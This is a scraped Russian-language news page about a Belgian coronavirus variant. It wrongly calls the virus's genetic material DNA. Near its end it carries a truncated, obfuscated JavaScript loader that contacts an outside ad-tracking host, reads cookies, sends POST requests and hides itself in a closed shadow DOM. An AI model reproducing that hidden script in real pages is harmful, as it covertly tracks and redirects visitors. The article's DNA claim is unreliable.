В мире

Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавируса

Новый штамм обнаружен у пациентов, получающих амбулаторное лечение

В Бельгии обнаружили новый штамм коронавируса, который ведет себя не так как другие мутации.

Об этом сообщает Le Figaro

Обычно при мутации происходит потеря копиями фрагментов ДНК исходного вируса. Бельгийский вариант, напротив, собирает множество дополнений.

Читайте также:
Ученые в США выяснили, почему новые штаммы коронавируса более заразны

Пока рано говорить, является ли он более заразным или опасным, чем другие варианты. Новый штамм обнаружен у пациентов, получающих амбулаторное лечение, а не тех, кто находится в отделениях интенсивной терапии.

В тренде
Прекратите шпионить! Как в Болгарии «вскрыли» агентов РФ в Минобороны и разведке

У ученых также нет "ни малейшего представления" о его устойчивости к вакцинам.

Ранее всемирная организация здравоохранения предупредила, что в Украине могут появиться новые опасные штаммы коронавируса.

Напомним, журналисты "Сегодня" разобрали самые популярные вопросы о новых штаммах коронавируса.

Все подробности в спецтеме Коронавирус

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Бельгия
мутации
мутация
коронавирус
COVID-19

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

 Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаСтраны массово отказываются от вакцины AstraZeneca: что происходит?Евросоюз  Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаКакие страны приостановили вакцинацию AstraZeneca (список)Евросоюз  Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаСкандал вокруг AstraZeneca: какие страны не остановили вакцинацию и почемуЕвросоюз  Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаСкандал вокруг AstraZeneca: в Норвегии подтвердили связь между тромбозом и вакцинойЕвросоюз  Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаДТП автобуса с украинцами в Польше: копы начали расследование (видео с места аварии)Евросоюз  Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавирусаЕго выдало тату: Украина помогла Германии раскрыть наемного убийцу из ФСБЕвросоюз

Новости партнеров

Загрузка…

загрузка…

 Ведет себя не так, как другие. В Бельгии обнаружили необычную мутацию коронавируса

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2021

Лента новостей

Главное

Нажимая на кнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с

правилами использования

файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

Материалы по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button